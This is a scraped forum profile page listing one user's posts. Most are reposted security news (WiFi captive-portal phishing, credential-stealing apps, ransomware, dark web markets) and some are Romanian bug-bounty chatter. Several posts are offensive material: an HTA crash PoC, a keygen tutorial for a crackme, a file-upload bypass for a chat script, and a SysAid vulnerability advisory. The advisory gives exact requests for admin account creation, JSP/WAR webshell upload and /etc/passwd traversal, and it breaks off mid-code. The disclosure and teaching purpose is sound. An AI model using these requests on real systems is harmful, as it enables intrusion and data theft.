Jump to content


Active Members
  • Posts

  • Joined

  • Last visited

  • Days Won


Everything posted by Aerosol

  1. Today anywhere you go, you will come across Free or Public WiFi hotspots -- it makes our travel easier when we stuck without a data connection. Isn’t it? But, I think you’ll agree with me when I say: This Free WiFi hotspot service could bring you in trouble, as it could be a bait set up by hackers or cyber criminals to get access to devices that connects to the free network. This is why mobile device manufacturers provide an option in their phone settings so that the device do not automatically connects to any unknown hotspot and asks the owner for approval every time it comes across a compatible WiFi. Hackers can grab your Credit Card Data. Here’s How? Recently, security researchers from mobile security company 'Wandera' have alerted Apple users about a potential security flaw in iOS mobile operating system that could be exploited by hackers to set up a rogue WiFi spot and then fool users into giving up their personal information, including credit card details. The loophole leverages the weakness in the default behaviour of iOS devices, including iPhones, iPads and iPods, with WiFi turned on, Ars reported. This could let attackers create their malicious wireless hotspots and inject a fake "captive portal" page mimicking the genuine Apple Pay interface asking users to enter their credit card details. A hacker nearby a customer connecting an Apple Pay transaction could launch an attack in an attempt to force the victim’s mobile to connect to evil hotspot and then display a popup portal page which is designed in such a way that users could be fooled into believing Apple Pay itself is requesting to re-enter their Credit Card details. According to the researchers, spoofers can loaf around a point-of-sale (POS) machine with an Apple Pay terminal and could continuously launch the attack in order to victimize more people. However, the attack may not trick a large number of people because the fake captive portal page imitating Apple Pay interface is displayed under a fairly prominent "Log In" title bar, the report says. The simple and easiest workaround to prevent such attacks is to turn your device's Wi-Fi simply OFF if you are not intentionally connecting to a known Wireless network. Security researchers have warned Apple about the loophole and meanwhile recommended that Apple and Google should "consider adopting a secure warning when displaying captive portal pages to users so that users exercise caution." Source
  2. Today everybody wants to know — Who visited my Facebook profile?, Who unfriended me from the Facebook Friend list?, Who saw my Facebook posts?, and many other features that isn't provided by Facebook by default. So most Facebook users try to find out a software and fall victim to one that promises to accomplish their desired task. Hackers make use of this weakness and often design malicious programs in order to victimize broad audience. Following I am going to disclose the realities behind one such software designed cleverly to trick Facebook users to make them believe it is genuine. UnfriendAlert, a free application that notifies you whenever someone removes you from the Facebook friend list, has been found collecting its users' Facebook credentials. UnfriendAlert Stealing your Facebook Credentials: Security researchers at Malwarebytes have warned users of the UnfriendAlert app saying that the notorious app asks users to login with their Facebook credentials to activate unfriends monitoring and alert service for your Facebook profile. Facebook has provided API OAuth login system for third party applications, where users don't need to provide their Facebook credentials to them. So you should never submit your Facebook password to any third party service or desktop software in any case. Once you enter your login credentials, UnfriendAlert will send it to the website "yougotunfriended.com" owned by attackers. Late last month, UnfriendAlert was also classified as potentially unwanted program (PUP) which often displays unwanted advertisements and deceptively installs other malicious software and free apps when visiting some web pages in your Chrome, Firefox, and Internet Explorer, making you fail to block them. Uninstall UnfriendAlert and Change your Password Now! So users are recommended to uninstall UnfriendAlert App from your computer, and besides removing this, you are also advised to change your Facebook password as soon as possible. You can do this under "Settings —> Password —> Edit." Always do some research before installing any third party application as your one single mistake could compromise your online security and privacy in various ways. Source
  3. Asa este, gestul conteaza nu e asa important ce ofera. Am primit in total 5 pachete de la ei. urat din partea lor, ce sa zic nu toti sunt la fel. Link#1: https://rstforums.com/forum/99793-xss-olx-ro.rst Link#2: https://rstforums.com/forum/99416-2x-xss-olx-ro-reward.rst Am continuat sa caut si sa raportez din cauza ca mi-a facut o deosebita placere sa "lucrez cu ei" Au raspuns/remediat problema rapid + bunul simt. @lupulaurentiu atata timp cat primesti ceva se incadreaza la bug bounty.
  4. Aerosol

    Fun stuff

    @TheTime ti-am dat tot ceea ce ai nevoie in pm, daca e nevoie ofer si unui administrator p.o.c. x2:// adevarat poza este neclara si am gresit eu legat de vector, am sa fac inca un screen. X3:// acum fac update la poza. Multumesc de atentionare oricum.
  5. L-am gasit de ceva vreme. Am raportat direct pe fb nu am mai stat sa dau mail. "Reward" : 1 pix, 1 agenda, 1 stick (4GB), felicitare...
  6. America takes photobombing REALLY seriously Medieval butcher bastards ISIS are adept at using the web to lure Western followers to their warped cause – but the internet can turn around and bite back. Air Force General Hawk Carlisle, head of US Air Combat Command, told a conference that analysts at the 361st Intelligence, Surveillance and Reconnaissance Group spotted a selfie snapped and posted online by an ISIS fighter standing outside a command-and-control building in the Mid East. "The [airmen are] combing through social media and they see some moron standing at this command," Carlisle said at the speech, Air Force Times reports. "And in some social media, open forum, bragging about command and control capabilities for Da'esh. And these guys go 'ah, we got an in.'" According to the general, the analysts worked out the position of the building based on the information posted online, and 22 hours later the Air Force paid a visit, dropping three Joint Direct Attack Munitions (JDAM) – dumb iron bombs fitted with fins and a guidance package for precision strikes – on the building, destroying it. "Through social media. It was a post on social media. Bombs on target in 22 hours," Carlisle said. "It was incredible work, and incredible airmen doing this sort of thing." On Wednesday, US Congress's House Homeland Security Committee heard that ISIS is flooding social networking websites with propaganda, reaching thousands of potential recruits to their evil cause. At those briefings, Michael Steinbach, assistant director in the FBI's Counterterrorism Division, claimed Apple and Google's use of encryption was helping ISIS by hiding their communications from view. Based on this latest case, ISIS is doing a pretty good job of making it easy for Uncle Sam to spot them. Source
  7. We live in the social mobile era, where we all collect and share vast amounts of data about ourselves and others. By handing over that data to corporations and governments we are promised great benefits in everything from our health and our wealth to our safety from criminals. But of course there are dangers too and I've been hearing some horror stories about when Big Data becomes Big Brother. The first was from one of the technology industry's more colourful figures. John McAfee, who is in London this week for the Infosecurity Europe conference, is the man who virtually invented the anti-virus industry. He sold his stake in McAfee more than 20 years ago and has since had numerous adventures, culminating in his flight from Belize in 2012 after police in the Central American state tried to question him about a murder. He was described by Belize's prime minister at the time as "extremely paranoid, even bonkers". So, perhaps not surprising, that the Infosecurity crowd who gathered to hear him speak were treated to dire warnings about the threat to their security from two sources - their mobile phones and their governments. But of course just because you are paranoid it does not mean they are not out to get you, and when I meet John McAfee after his speech he gives a perfectly coherent account of why we should be worried. We are now all carrying around smartphones, he explains, but security has not caught up with the fact that they are very advanced computers which can be used to spy on us if we install any number of untested apps that may have been created by people with criminal intent. But it's government spying on those phones that really worries him. He cheers the brake which the Senate applied to the US government's surveillance powers at the weekend, but fears that in Britain no such limits are in place. In particular, he rails against any attempt to try to crack the encryption that protects many personal messages. When I suggest that there might be a need to know what criminals and terrorists are planning, he bats that away: "We have lived with criminals for ever - does that mean we should all have to suffer?" He compares encryption with whispering a message in your wife's ear and asks whether we would have thought it justified years ago to ban whispering. "If it sounds insane for govenment to say you are not allowed to whisper to your wife - it is insane." And he says the big technology companies should have the courage to stand up to governments on this issue: "If enough people stand up the government will back down." When I suggest delicately that his colourful past might make people disinclined to take him seriously, he bats that straight back at me. "My colourful life implies that I've done some serious things," he says, explaining that his experiences in Belize have shown him just how dangerous a rogue government can be. You can hear my interview with John McAfee on Tech Tent, which this week comes live from the Cheltenham Science Festival. Here too, the question of what we are doing with our data has been a major theme. Last night I was the moderator at an event called Big Data, Big Brother, where the panel expressed their worries about the uses to which our data could be put, in front of an audience which shared their fears. The lawyer Marion Oswald mentioned the Samaritans' Radar Twitter app as an example of where public data posted by people who might or might not have been suicidal could have been used in a questionable way without their consent. A software engineer Martyn Thomas advised us to be wary of claims that data was anonymised, explaining how easy it was to identify someone once you had pieced together just a few data points. Here in the home of GCHQ, the audience seemed more concerned about corporate surveillance than government spies, and many were enthusiastic about ad-blocking software and other means of throwing the likes of Google off your trail. But afterwards in the more relaxed setting of the Festival's Ideas Cafe, data scientists from Warwick University reminded us of the positive aspects of their work. I sat at a table where a computer scientist explained how he was mapping London to spot which areas should be targeted for diabetes prevention measures. He was using data from a variety of sources, including a credit rating agency, to examine lifestyles and hence vulnerability to Type 2 diabetes. While some will be concerned about how medical and financial data are combined in this way, many will see the benefits of applying data science to this kind of task. As the Big Data gold rush continues, lawyers, ethicists and consumer groups are all going to have their work cut out to help us get a good balance between the risks and rewards of crunching the numbers. Source
  8. A security software firm has warned about a new strain of "ransomware" - while finding that even Russian hackers can be haggled down. Ransomware is software which locks you out of your files until a fee is paid to the criminals behind the attack. Checkpoint researcher Natalia Kolesova detailed information about Troldash, a newly-discovered strain. Once it infects a machine, Troldash provides an email address with which to contact the attackers. "While the most ransom-trojan attackers try to hide themselves and avoid any direct contact," Ms Kolesova explained, "Troldesh's creators provide their victims with an e-mail address. The attackers use this email correspondence to demand a ransom and dictate a payment method." Troldash was distributed via a spam email - and once downloaded, immediately set to work encrypting files before placing a text file of ransom instructions on the target's computer. Posing as a victim named Olga, the researcher contacted the scam artist, and received a reply with instructions to pay 250 euros to get the files back. Suspecting the reply was automated, Ms Kolesova pressed for a more human response, asking more details about how to transfer the money, and pleading with the hacker to not make them pay. Responding in Russian, the scammer offered to accept 12,000 roubles, a discount of around 15%. After Ms Kolesova pleaded further, the email response read: "The best I can do is bargain." Eventually the unknown man or woman was talked into accepting 7,000 roubles - 50% less than the first demand. "Perhaps if I had continued bargaining, I could have gotten an even bigger discount," Ms Kolesova concluded. Ransomware is a particularly vicious problem for many victims around the world. One strain, Cryptolocker, was said to have infected more than 250,000 computers worldwide. Another variant locked users out of their favourite games unless they paid a fee. The company did not pay the ransom - and recommended that up-to-date security software designed to protect against ransomware and other attacks was a better approach. Source
  9. /* #[+] Author: Mohammad Reza Espargham #[+] Title: MS Windows HTA (HTML Aplication) - Crash PoC #[+] Date: 19-05-2015 #[+] Tested on: Win7 dash> save below code as Crash.hta file and Double Click on it Crash... */ <html> <title>Mohammad Reza Espargham</title> </br> <body onload="javascript:ReZa();"></body> <script> function ReZa() { var buffer = '\x43'; var buffer1 = '\x42'; var buffer2 = '\x41'; for (i =0;i<956;i++) { buffer+=buffer+'\x42'; document.write('<>'+buffer+buffer1+buffer2); }} </script> </html> Source @alinpetre abia a aparut pe packetstorm verifica si tu inainte sa comentezi.
  10. Introduction GammaRay is a software introspection tool for Qt applications developed by KDAB. Leveraging the QObject introspection mechanism it allows you to observe and manipulate your application at runtime. This works both locally on your workstation and remotely on an embedded target. Augmenting your instruction-level debugger, GammaRay allows you to work on a much higher level, with the same concepts as the frameworks you use. This is especially useful for the more complex Qt frameworks such as model/view, state machines or scene graphs. Among other things GammaRay can: Browse the QObject tree with live updates. View, and to some extent, edit QObject static and dynamic properties. View and call slots of a QObject. View other QObject elements such as signals, enums and class infos. List all QObject inbound and outbound signal/slot connections. Provide a layout information overlay for QWidget applications. Inspect all QPainter operations used to draw a specific widget. Browse the QtQuick2 item tree and scenegraph. Plot object lifetime and emitted signals. View the content of any QAbstractItemModel. Very useful when debugging a proxy model chain for example. Browse the QAbstractProxyModel hierarchy. Browse the item tree of any QGraphicsView scene. Show a live preview of QGraphicsView items, including showing their coordinate system, transformation origin, rotate/zoom/pan, etc. Intercept translations and change them at runtime. Inspect all building blocks of a QStyle. Act as a complete java script debugger, attachable to any QScriptEngine (including the usually not accessible one used by QtQuick1 internally). Perform HTML/CSS/DOM/JS introspection/editing/profiling on any QWebPage, thanks to QWebInspector. Browse the QResource tree and its content. Browse QStateMachines, along with their states and transitions. Show all registered meta types. Show all installed fonts. Show all available codecs. Browse all QTextDocuments, along with the ability to edit them and view their internal structures. Show all QTimers and their statistics (number of wakeups, wakeup time, ...) Link: https://github.com/KDAB/GammaRay
  11. Aerosol


    Salut si bine ai venit!
  12. rstforums.com packetstormsecurity.com resources.infosecinstitute.com krebsonsecurity.com Sunt foarte multe.
  13. Keygenning is a process of finding a valid key for a program. It is used for cracking/piracy. Most of the cracking has been documented on x86, there haven’t been many articles on x64 cracking. In this article, we will show you how to keygen a Linux x64 bit application on a Linux computer. For purpose we will use 1: Linux machine ( 64bit mint box) 2: EDB debugger 3: IDA Disassembler 4: Compiler to write a key generator 5: Fill out the form below for the files associated with this article Let’s run file command to check the type of file. file r5 r5: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=86bf854ce620288567d153883d4609163485d34d, not stripped From the output, we see the build version, and it is a dynamically linked file. ~/Desktop $ nm r5 0000000000601109 B __bss_start 00000000006010e0 D buf 000000000040069d T check_password 0000000000601109 b completed.6972 0000000000601060 D __data_start 0000000000601060 W data_start 00000000006010a0 D delta 00000000004005e0 t deregister_tm_clones 0000000000400650 t __do_global_dtors_aux 0000000000600e18 t __do_global_dtors_aux_fini_array_entry 0000000000601068 D __dso_handle 0000000000600e28 d _DYNAMIC 0000000000601109 D _edata 0000000000601110 B _end 0000000000400894 T _fini 0000000000400670 t frame_dummy 0000000000600e10 t __frame_dummy_init_array_entry 0000000000400a80 r __FRAME_END__ 0000000000601000 d _GLOBAL_OFFSET_TABLE_ w __gmon_start__ 0000000000400500 T _init 0000000000600e18 t __init_array_end 0000000000600e10 t __init_array_start 00000000004008a0 R _IO_stdin_used w _ITM_deregisterTMCloneTable w _ITM_registerTMCloneTable 0000000000600e20 d __JCR_END__ 0000000000600e20 d __JCR_LIST__ w _Jv_RegisterClasses 0000000000400890 T __libc_csu_fini 0000000000400820 T __libc_csu_init U __libc_start_main@@GLIBC_2.2.5 00000000004007b6 T main 0000000000601080 D master U printf@@GLIBC_2.2.5 U puts@@GLIBC_2.2.5 U random@@GLIBC_2.2.5 0000000000400610 t register_tm_clones 00000000004005b0 T _start U strcmp@@GLIBC_2.2.5 U strcpy@@GLIBC_2.2.5 U strlen@@GLIBC_2.2.5 0000000000601110 D __TMC_END__ x64 assembly basics x64 consists of extended register set and some extra instructions are added as well. Following is the list of added registers in x64 r8, r9 , r10, r11, r12, r13, r14, r15 Lower 32 bits of r8 can be accessed by r8d, lower 16 bits can be accessed by r8w and lower 8 bits can be accessed by rb8 and more over RIP (instruction pointer) can be directly accessed. All the register in x64 are 64bit in sizes . RIP is also 64bit but Current implementations only support 48 bit linear addresses. In addition to normal registers it also added SSE registers namely from xmm8 – xmm15 If any data movement operation is performed on EAX, it zero extends the higher 32 bits of RAX register. Some added instructions are lodsq, stosq etc. For the purpose of debugging, we will use an x64 debugger known as EDB on Linux. This debugger is similar to ollydbg (windows) and is quite easy to use .Following is the default pane of EDB Argument passing in x64 is quite different from x86 itself Arguments are passed in registers RDI, RSI, RDX, RCX, r8 and r9 rest of the parameters are passed on the stack Navigation is simple just like ollydbg Running our crackme file just like that gives us the following output /Desktop $ ./r5 Usage: ./r5 password Maybe plaintext isn’t good after all. Which gives us a hint that it requires a password, which we have to figure out Opening it in a disassembler gives us an idea of what is happening around. Apparently it is looking for a parameter and is passing it to a function Clearly you can see that it passing argv[1] as a parameter to function check_password() The first hint is about the length of the input string, which should be equal to the length of “this_is_not_even_interesting_its_garbage” .data:00000000006010E0 ; char buf[] .data:00000000006010E0 buf db 'this_is_not_even_interesting_its_garbage',0 .data:00000000006010E0 ; DATA XREF: check_password+1C#o .data:00000000006010E0 ; check_password+3C#o ... .data:00000000006010E0 _data ends .data:00000000006010E0 .bss:0000000000601109 ; =========================================================================== and is checked here call _strlen ; Call Procedure mov rbx, rax mov edi, offset buf ; “this_is_not_even_interesting_its_garbag”… call _strlen ; Call Procedure cmp rbx, rax ; Compare Two Operands jz short Go ; Jump if Zero (ZF=1) After that, this string is replaced by our own input string mov rax, [rbp+passcode] mov rsi, rax ; src mov edi, offset buf ; "this_is_not_even_interesting_its_garbag"... call _strcpy ; Call Procedure mov [rbp+VarCheck], 1 jmp loc_400791 ; Jump After this operation program goes in a loop and loop body is skipped if value at index of variable delta is zero movzx eax, delta[rax] ; If not, it performs some mathematical operations on the input strings leveraging on delta and other parameters which can be represented in C language as x = (random() % delta[index] ) + 1; delta[index] = delta[index] - x; var_check = var_check ^ (unsigned int )delta[index] ; random() call is not initialized with srand() so it can be predicted easily. Finally, after the 40 rounds of loop, the mutated string is compared against “this_aint_that_simple_but_good_luck_haha” and if it is equal, “password OK” message is printed Now to calculate that string we can perform the exact opposite on this string to get out key We can use the following C program to do so. #include <stdio.h> unsigned char delta[] = { 3, 253, 3, 249, 0, 3, 6, 0, 241, 0, 250, 7, 22, 235, 8, 252, 246, 2, 254, 243, 4, 19, 1, 234, 237, 15, 253, 240, 242, 15, 12, 243, 241, 12, 7, 0, 5, 14, 10, 4, }; unsigned char buff [48] ; int main(int argc, char **argv) { int index = 0; int var_check = 1; unsigned char x = '\x00'; strcpy(buff, "this_aint_that_simple_but_good_luck_haha"); while ( var_check ) { index = 0; var_check = 0; while ( index < 40) { if (delta[index]) { x = (random() % delta[index] ) + 1; delta[index] = delta[index] - x; var_check = var_check ^ (unsigned int )delta[index] ; buff[index] = buff[index] + x; } // if zero index++; } } printf("%s\n", buff); } Compiling and running this program gives us the following output: “well_done_now_go_on_irc_and_ask_for_more” ~/Desktop $ ./r5 “well_done_now_go_on_irc_and_ask_for_more” password OK Source
  14. When performing a Web Application Security Assessment, an important step is Fingerprinting which allows for further exploitation by an attacker. So as a security researcher/pentester, we should do well at fingerprinting the web server, which gives lot of information like application name, software version, web server info, OS, and more. This helps for known vulnerabilities, researching vulnerabilities and exploiting. So here I will discuss some techniques which are required for this task: Finger Print Methodology How to perform this activity: obviously for an attacker there is no hard and fast rule to perform this operation. For pentesting we will discuss some methods below. HTTP Header Banner Grabbing The most basic form of identifying a web framework is to gather the basic architecture like application name and server banner which will be more helpful for banner grabbing. Banner grabbing by Netcat: So we got AkamaiGhost, which is a load balancer that prevents finger printing. Banner grabbing by Telnet: Here we got a lot of information about the application and server for further exploitation. By Nmap: Using some Nmap command we can also enumerate information about application and web server finger printing. If you want to know more about Nmap please click here. By sending a malformed HTTP Header request/Junk request Review by inspecting cookies Crawling cookies can reveal lots of information about the application. See the below example: Host: resources.infosecinstitute.com User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referrer: http://www.google.co.in/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0CCYQjBAwAQ&url=http%3A%2F%2Fresources.infosecinstitute.com%2Fnmap-cheat-sheet%2F&ei=JCpCVaK1Mo-wuASe1YC4Cg&usg=AFQjCNFYlxcvuiEFw2QCg-9_e6R-M76_9Q&sig2=y9KWwXGOOQ_bVpfKw-fiaA&bvm=bv.92189499,d.c2E&cad=rja Cookie: __utma=192755314.2098953166.1427376874.1427376874.1427376874.1; __utmz=192755314.1427376874.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); visitor_id12882=216943492; __distillery=v20150227_1ce95eb6-6db3-422d-8dfe-497a0e3b3b7f; _ga=GA1.2.2098953166.1427376874; X-Mapping-fjhppofk=767BD7CA2B9E38F518B95F35B5326A01 Connection: keep-alive Automation and Tools Implementation Here we will discuss some of the tools which can be of further use for finger printing. We will discuss one by one. Whatweb: Currently Whatweb is the most important tool for finger printing in Kali Linux. It includes the below features: Text strings (case sensitive) Regular expressions Google Hack Database queries (limited set of keywords) MD5 hashes URL recognition HTML tag patterns Custom ruby code for passive and aggressive operations See the below screenshot. BlindElephant: Blind Elephant is an open-source generic web application finger printer that produces results by examining a small set of static files. Basically it is called static finger printing. It searches the file name for file extensions developed by the Python library and gives the finger print result. Fireup the below command to install: svn co https://blindelephant.svn.sourceforge.net/svnroot/blindelephant/trunk blindelephant Follow the below pictures: Scan the target with the below command: Plugin Support: With –p switch we can search for a plugin like the below command for WordPress: Blindelephant.py –s –p guess target plugin python BlindElephant.py -u target Actually it scans for static files, version no, config file. A best candidate for finger printing is by checking the checksum of the file like with the hashing method. Some others are below: Css file Js file .ini file En-GB ini file and many more Extending support for Python From a hacker’s perspective, we need customized finger printing and our function should support it. Though it is open source, we can do customization. Check the below snippet of code: $python >>> from blindelephant.Fingerprinters import WebAppFingerprinter >>> >>> #Construct the fingerprinter >>> #use default logger pointing to console; can pass "logger" arg to change output >>> fp = WebAppFingerprinter("http://laws.qualys.com", "movabletype") >>> #do the fingerprint; data becomes available as instance vars >>> fp.fingerprint() (same as above) >>> print "Possible versions:", fp.ver_list Possible versions: [LooseVersion ('4.22-en'), LooseVersion ('4.22-en-COM'), LooseVersion ('4.23-en'), LooseVersion ('4.23-en-COM')] >>> print "Max possible version: ", fp.best_guess Max possible version: 4.23-en-COM Wappalyzer Website: Wappalyzer Wapplyzer is a Firefox Chrome plug-in. It works only on regular expression matching and doesn’t need anything other than the page to be loaded on the browser. It works completely at the browser level and gives results in the form of icons. Sometimes it may a be false positive, so be careful when using this tool. Desenmascara.me This is online tool for extracting information. It reveals lots of info including web server info, application info and known vulnerabilities. httprint – the advanced HTTP fingerprinting engine This uses static analysis with a signature file that contains a different header file for different types of servers. ./httprint -s signatures.txt -o apache1.html -h apache.example.com s-signature for different http header o-output to a file h-host file HTTP Recon httprecon project / download This is all in one project which provides finger printing and reporting. It involves five tabs which help security testers to refine the results during finger printing. See the image below. We got lots of information from here. NetCraft Another all in one tool is NetCraft, which is an online tool. We can grab various information by using this tool. Netcraft Extension - Phishing Protection and Site Reports References An Introduction to HTTP Fingerprinting Wappalyzer http://blindelephant.sourceforge.net/ Source
  15. WHEN ROSS ULBRICHT was sentenced to life in prison without parole last Friday, the judge in his case made clear that her severe punishment wasn’t only about Ulbricht’s personal actions in creating the Silk Road’s billion-dollar drug market. As Judge Katherine Forrest told the packed courtroom, she was also sending a message to any would-be online drug kingpins who might follow in his footsteps. “For those considering stepping into your shoes,” she said, “they need to understand without equivocation that there will be severe consequences.” But despite Ulbricht’s ultimate punishment, the lesson for anyone closely watching the Dark Web drug trade has hardly been one of inevitable consequences. As independent researcher Gwern Branwen has documented in an ongoing survey of more than 70 Dark Web drug markets created after Ulbricht founded the Silk Road, only five of those sites’ administrators have been arrested. For many of the others, the security model Ulbricht pioneered—using Tor and bitcoin to protect administrators, buyers and sellers—has successfully kept law enforcement fumbling in the shadows. In fact, the difficulty of laying hands on Dark Web drug market creators was one reason Ulbricht’s prosecutors asked for a lengthy sentence. If law enforcement can’t apprehend all Ulbricht imitators, went prosecutors’ argument, it had better compensate with harsher punishment for those it does catch. “Although the Government has achieved some successes in combating these successor dark markets, they continue to pose investigative challenges for law enforcement,” read the prosecution’s letter. “To the extent that would-be imitators may view the risk of being caught to be low, many are still likely to be deterred if the stakes are sufficiently high.” When Ross Ulbricht begins his life sentence at a federal prison in the coming weeks, in other words, he won’t just be serving his own time. He’ll also be serving the time of all the Dark Web drug lords who escaped his fate. Here are five of those online narco-kingpins who—for now—remain at large. Variety Jones Despite Ulbricht’s arrest and the rounding up of four of his Silk Road lieutenants, the second most important figure in that black market operation still hasn’t been captured or even publicly identified. Variety Jones served as Ulbricht’s security consultant, advisor, and even mentor, according to Ulbricht’s journal and chat logs the prosecutors admitted into evidence at trial. The anonymous figure, who sold cannabis seeds on the site, also secretly advised Ulbricht on everything from tracking sales statistics to creating a personal cover story. It was Jones who named him the Dread Pirate Roberts to give the impression of a rotating command rather than a single individual. And Jones also nudged the Dread Pirate Roberts toward violence, suggesting in a private chat that they murder an employee believed to have stolen hundreds of thousands of dollars in bitcoin from the site. Atlantis During the Silk Road’s time online, its most aggressive competition came from a site called Atlantis, a Dark Web market with a similar business model, but with the addition of an advertising budget. Atlantis went so far as to post a public YouTube video ad and to host an “ask-me-anything” session on Reddit with the site’s unnamed founder and its CEO. In an encrypted interview, those leaders would later describe their site to me as the “Facebook to [silk Road’s] Myspace.” Just before the FBI bust of the Silk Road in the summer of 2013, however, Atlantis’ founders shuttered their site and absconded with all their users’ bitcoins. Ross Ulbricht would write in his journal that the Atlantis admins had privately warned him of a purported security flaw in Tor that inspired them to abandon ship. The Atlantis creators never resurfaced—neither online nor in the hands of law enforcement. Dread Pirate Roberts 2 Just one month after the original Silk Road was seized, Silk Road 2 came online. At its helm, of course, was a new Dread Pirate Roberts; Ulbricht’s cover story of a rotating command had become a self-fulfilling prophesy. The second DPR was at least as talkative as the first, posting political statements to the Silk Road 2 forums and even creating a twitter account. But after three Silk Road 2 administrators were arrested—all of whom had worked for the original Dread Pirate Roberts on Silk Road 1.0—the new Dread Pirate Roberts gave up control of the site to a new administrator named Defcon. Defcon would be identified as 26-year-old Blake Benthal and arrested as part of Operation Onymous, a mass purge of Dark Web sites by the FBI and Europol late last year that took down dozens of Tor hidden services. But the second Dread Pirate Roberts seemed to escape that international dragnet. Verto For a year starting in March of 2014, Evolution was the new and improved mecca of the Dark Web’s underground economy. At its peak, Evolution had more than twice as many product listings as the Silk Road ever offered, including types of contraband Ulbricht never allowed on the Silk Road such as stolen financial information. And it somehow ran faster and stayed online far more reliably than its competitors. That criminal professionalism was in part the work of an experienced cybercriminal called Verto, Evolution’s pseudonymous founder and the founder of the earlier Dark Web black market known as Tor Carder Forum, devoted to identity theft. Then in March of this year, Verto and Evolution co-founder Kimble abruptly shut down the site, taking with them millions of dollars of their users’ bitcoins. A Department of Homeland Security investigation continues to search for the two Evolution administrators, revealed a subpoena sent to the “darknetmarkets” forum of Reddit seeking to identify Evolution staffers. But no arrests have been announced. Darkside For any Dark Web drug lord trying to avoid being the next Ross Ulbricht, step one is not to be in the United States. That’s a lesson from Darkside, the creator of RAMP, the Russian Anonymous Marketplace. RAMP has survived three years online—longer than any other Dark Web drug market—by focusing exclusively on Russian clientele. “We never mess with the CIA, we work only for Russians and this keeps us safe,” Darkside told WIRED in December of last year. “You can’t rape the whole world and remain safe.” Darkside, who uses an illustration of Edward Norton as his online avatar, said at the time of that interview that RAMP was continuing to earn him close to $250,000 a year in revenue, far less than the Silk Road but enough for Darkside to consider himself a “rich guy” in his local currency. And he offered another tip to avoid the kind of law enforcement crackdown that targeted the Dread Pirate Roberts: don’t talk politics. In fact, all political discussion is banned on RAMP. “Politics always attract extra attention,” Darkside wrote. “We do not want that.” Source
  16. | # Title : boomchat-v4.2 Upload Vulnerability | # Author : indoushka | # email : indoushka4ever@gmail.com | # Dork : no 4 noob | # Tested on: Win8 fr pro | # Bug : Upload | # Download : www.20script.ir ======================================= 1- register in script 4 chat 2- change photo of profil 3- chang evil from 1.php to 1.php.jpg 4- go to Source
  17. Hi, tl;dr Found lots of vulns in SysAid Help Desk 14.4, including RCE. SysAid have informed me they all have been fixed in 15.2, but no re-test was performed. Full advisory below, and a copy can be obtained at [1]. 5 Metasploit modules have been released and currently awaiting merge in the moderation queue [2]. Regards, Pedro [1]: https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt [2]: https://github.com/rapid7/metasploit-framework/pull/5470 https://github.com/rapid7/metasploit-framework/pull/5471 https://github.com/rapid7/metasploit-framework/pull/5472 https://github.com/rapid7/metasploit-framework/pull/5473 https://github.com/rapid7/metasploit-framework/pull/5474 >> Multiple vulnerabilities in SysAid Help Desk 14.4 >> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security ================================================================================= Disclosure: 03/06/2015 / Last updated: 03/06/2015 >> Background on the affected product: "SysAid is an ITSM solution that offers all the essentials, with everything you need for easy and efficient IT support and effective help desk operations. Its rich set of features includes a powerful service desk, asset management and discovery, self-service, and easy-to-use tools for understanding and optimizing IT performance." Metasploit modules that exploit #1, #2, #3, #4, #5 and #6 have been released and should be integrated in the Metasploit framework soon. All vulnerabilities affect both the Windows and Linux versions unless otherwise noted. >> Technical details: 1) Vulnerability: Administrator account creation CVE-2015-2993 (same CVE as #10) Constraints: none; no authentication or any other information needed Affected versions: unknown, at least 14.4 GET /sysaid/createnewaccount?accountID=1337&organizationName=sysaid&userName=mr_lit&password=secret&masterPassword=master123 This creates an account with the following credentials: mr_lit:secret Note that this vulnerability only seems to be exploitable ONCE! Subsequent attempts to exploit it will fail even if the tomcat server is restarted. 2) Vulnerability: File upload via directory traversal (authenticated; leading to remote code execution) CVE-2015-2994 Constraints: valid administrator account needed (see #1 to create a valid admin account) Affected versions: unknown, at least 14.4 POST /sysaid/ChangePhoto.jsp?isUpload=true HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------81351919525780 -----------------------------81351919525780 Content-Disposition: form-data; name="activation"; filename="whatevs.jsp" Content-Type: application/octet-stream <html><body><%out.println(System.getProperty("os.name"));%></body><html> -----------------------------81351919525780-- The response returns a page which contains the following: var imageUrl = "icons/user_photo/14222767515000.1049804910604456_temp.jsp?1422276751501"; var thumbUrl = "icons/user_photo/14222767515000.1049804910604456_temp_thumb.jsp?1422276751501"; if(imageUrl != null && $.trim(imageUrl).length > 0) { document.getElementById("cropbox").src = imageUrl; document.getElementById("preview").src = thumbUrl; parent.glSelectedImageUrl = "icons/user_photo/14222767515000.1049804910604456_temp.jsp"; Go to http://<server>/sysaid/icons/user_photo/14222767515000.1049804910604456_temp.jsp to execute the JSP. 3) Vulnerability: File upload via directory traversal (unauthenticated; leading to remote code execution) CVE-2015-2995 Constraints: no authentication or any other information needed. The server has to be running Java 7u25 or lower. This is because Java 7u40 (FINALLY!) rejects NULL bytes in file paths. See http://bugs.java.com/bugdatabase/view_bug.do?bug_id=8014846 for more details. Affected versions: unknown, at least 14.3 and 14.4 POST /sysaid/rdslogs?rdsName=../../../../sample.war%00 <... WAR payload here ...> 4) Vulnerability: Arbitrary file download CVE-2015-2996 (same CVE as #8) Constraints: none; no authentication or any other information needed (see #5 to obtain the traversal path) Affected versions: unknown, at least 14.4 GET /sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd 5) Vulnerability: Path disclosure CVE-2015-2997 Constraints: none; no authentication or any other information needed Affected versions: unknown, at least 14.4; only works on the Linux version POST /sysaid/getAgentLogFile?accountId=<traversal>&computerId=<junk characters> Metasploit PoC: large_traversal = '../' * rand(15...30) servlet_path = 'getAgentLogFile' res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], servlet_path), 'method' => 'POST', 'data' => Zlib::Deflate.deflate(Rex::Text.rand_text_alphanumeric(rand(100) + rand(300))), 'ctype' => 'application/octet-stream', 'vars_get' => { 'accountId' => large_traversal 